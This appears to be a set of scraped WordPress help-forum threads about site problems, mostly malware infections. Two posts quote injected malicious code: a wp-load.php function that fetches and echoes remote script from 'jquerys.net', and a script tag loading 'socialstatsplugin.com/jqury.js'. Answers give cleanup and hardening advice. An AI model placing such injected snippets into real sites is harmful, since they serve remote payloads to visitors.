I'm having problems with a Wordpress installation I currently have.
There has been a large amount of code being injected into the header and I'm not sure where its coming from. I've looked over all the files in the wp-content folder and nothing has been found.
I've pasted the source here: http://pastebin.com/cLS6s9V8. It starts at line 96.
This is happening with all the pages. How can I get rid of it?
Based on the location, I would say something hooked into the wp_head() call of your wordpress site. Maybe a rogue plugin?
http://codex.wordpress.org/Function_Reference/wp_head
Related
In my wordpress website .htaccess has some strange redirection script, i removed the file but once the site is browsed the .htaccess file is automatically created with the strange script. in addition to that a folder named generall is also automatically creating even though we delete the folder. The folder has one php file and html file with strange scripts. Please help to resolve the hacking issue
You need to completely remove the infection from your site. Here's the easiest WordPress guide to follow: https://malcure.com/blog/security/the-easiest-guide-to-wordpress-malware-removal/
Your website still contains malware. You need to do a complete virus scan. You can use WordFence plugin to scan.
With these also try
1. Update all theme & plugins.
2. Do a manual update of your WordPress.
I hope this is a quick fix, but I've been searching for a solution and haven't found one.
Quick background:
I've been developing my Wordpress website locally using WAMP. I'm getting the site ready to deploy to a production server, and before deploying it I wanted to simply rename my theme folder from "naked-wordpress-master" to "My Portfolio" or something different.
First, I went to my theme folder and changed the name. I refreshed the Appearance > Themes page in the wp-admin site and got an error that the stylesheet could not be found.
I got a bit worried, so what I did next was rename the theme folder back to "naked-wordpress-master" and refresh the page. Same error.
I then tried deleting the theme from the wp-admin site and re-uploading it. I got an error the upload failed because the stylesheet couldn't be found.
FYI I'm using SCSS that outputs a style.min.css, but that shouldn't matter. I didn't change anything else from the header, functions.php, or stylesheet linking and it was all working just fine before.
Any ideas on what's going wrong and why my stlyesheet is failing to get recognized?
Thanks a bunch.
--Update--
I'm noticing my index.php loads fine, but sub-pages look like this
In your database find the "_options table (table prefix could be what ever you have set while installing wordpress). In options table, find the entries for "template" and "stylesheet" (both are different entries) and check their corresponding values. If that is not your theme name, change it manually to your theme name.
Also, make sure your theme has style.css at its root location. That's a technical requirement for enabling the theme.
After Update
Seems like its a rewrite issue. Check if the .htaccess file exists.
If it doesn't, in admin are, go to settings->permalinks, change the permalinks settings to something different, save the settings and revert back to what ever you had set before. (Ideally you should select the "post name" setting, which generates pretty permalinks which are also SEO friendly)
This will flush the permalink rules and also create the .htaccess file if its missing.
Hope this helps.
I've a problem with my wordpress website. When I insert some url for being embedded, it's not working fine.
Here is the issue URL : https://www.duosia.id/windows/cara-mengekstrak-files-menggunakan-winrar-dengan-mudah
And here is the Screenshot :
When I try to visit the embedded url. It's return 404 not found. You can check the embedded url here, https://www.duosia.id/windows/cara-mengekstrak-files-menggunakan-winrar-dengan-mudah/embed/
I've try these common solutions.
Update everything including WordPress, the theme and plugins. Available updates appear in Dashboard > Updates.
Deactivate all plugins in case there is a conflict. If the problem goes away while all plugins are inactive, then reactivate them one by one to determine which is causing the problem.
Switch to the default theme (such as Twenty Thirteen) then try to do what was not working. If the problem remains, it is a general WordPress or hosting issue. If it happens only while using our theme, please let us know.
Clear cache in both your browser and in any caching plugins that you are using (also disable services like CloudFlare, if used with your website).
Revert code changes if you have modified the theme’s code. If using a child theme, reactivate the parent theme.
But, seems no one work.
The WordPress post embeds don't seem to be working on your site.
This URL shows a live example of the problem:
https://www.duosia.id/windows/whatsapp-for-pc/
The two embeds present in that URL are returning a 404, therefore, oEmbeds are not loading properly and showing the 404 page:
https://www.duosia.id/windows/facebook-messenger-for-pc/embed/#?secret=kMPv636bx1
https://www.duosia.id/windows/line-for-pc/embed/#?secret=65m4VpxiYi
Have you tried testing those URLs in the plugin "Rewrite Rules Inspector"?
You should see something like this for any of the "embed" URLs:
index.php?name=$matches[1]&embed=true
Also, have you tried flushing the rewrite rules in WordPress or maybe setting the permalink structure to a different/default one (right now you seem to be using a structure of "category/post-name") to see if it changes anything?
For the file that you are embedding, are you uploading it to the Media Library or some other plugin?
First I would check on the server to verify that the file you are looking to access does exist.
Once you know that the file does exist, then repeat the steps you have listed again.
I recently moved one wordpress site to a different server.
After moving to different server the frontend works well but the admin section is blank.
If I rename the plugins directory the admin section also works.
How to fix this?
You have a plugin that is triggered on admin page, that has an error. Try renaming the plugin's folder one by one and find out which plugin is causing the error.
You also might want to check your apache error log. I'm sure you'll find an answer there.
Fun Fact - That blank page is actually called a White screen of death in WordPress terminology.
Read more here - http://codex.wordpress.org/Common_WordPress_Errors#The_White_Screen_of_Death
After you find which plugin is causing problem, Check your plugin main php file (ex. - myplugin.php) and check whether php tag opening and closing is proper or not(<?php ,?>).
Some times because of that it can cause problem because may be your code outputting something before header sent ("Header already sent error") and you will get "White screen of death" so try by simply removing closing tag (?>) from end of file or check properly for tag. I hope it will work for you.
this script keeps coming back to my wp-load.php file in public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
this directs to a virus site "jquerys.net"
What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.
kindly help
There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.
Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.
at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.
There is new virus in WP
There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>
i Have done some reviews for this kind of virus.
Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.
As said Just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.
Thanks